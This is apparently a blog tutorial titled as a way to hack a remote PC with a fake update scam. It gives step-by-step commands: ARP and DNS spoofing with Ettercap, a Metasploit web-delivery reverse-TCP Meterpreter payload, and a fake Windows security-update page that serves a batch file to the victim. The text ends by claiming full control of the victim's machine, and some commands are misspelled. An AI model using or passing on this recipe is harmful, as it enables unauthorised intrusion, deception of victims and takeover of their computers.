3 years ago by Rishi Deshpande, Certified Ethical Hacker & Pentester • 15 Min read
HACK REMOTE PC USING FAKE UPDATE SCAM
*In which we use Ettercap and Metasploit
1. First go to kali Linux home directory move to ( etc/ettercap)directory
2. move your original etter.dns file then edit new etter.dns
3. Add your kali ( your pc) IP address as { A*} record . as below example
*A: 192.168.244.129
4. Save it and run the following command with victim IP to spoof victim pc
# ettercap – i eth0 –T –q -p dns_spoof –M ARP /victim ip.//
It Activate dns_spoof plug –in.
5. Now time to use Metasploit type msfconsole in terminal
6. Now type as following
6.1 use exploit /multi/ script/web_delhivery
6.2 set LHOST { your kali ip} like= set LHOST 192.168.244.129
6.3 set LPORT 4444
6.4 set target 2
6.5 set payload windows/meterpreter/reverse_tcp
6.6 exploit
As shown in fig
7.Now copy the powershell .exe code and save as update.bat file in var/www/html
8. Create a fake website page showing windows security update message. In webpage give hyperlink as update.bat file.in var/www/html
9.Save this webpage as index.html and paste it in var/www/html
use href= ‘ your kali ip/update.bat
10.Now start apache server to start use command { service apache2 start }
11.When the victim open any webpage this page showing windows security update message will displayed.
*When victim click on download button save batch file batch file automaticallyexecute
12.Now you will get control of victim pc. Now type {session –l } command to display sessions opened when victim open link
You get meterpreter session like this
Please note, by this time you have full control on your victim PC.